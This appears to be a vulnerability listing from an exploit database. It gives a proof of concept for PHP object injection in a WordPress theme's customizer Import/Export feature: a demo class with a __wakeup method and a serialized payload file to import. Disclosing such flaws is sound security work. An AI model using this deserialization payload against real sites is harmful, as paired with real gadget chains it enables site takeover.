Share
## https://sploitus.com/exploit?id=WPEX-ID:EC4B9BF7-71D6-4528-9DD1-CC7779624760
To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named import.dat with the below content and import it (via Appearance > Customize > Import/Export):

O:4:"Evil":0:{};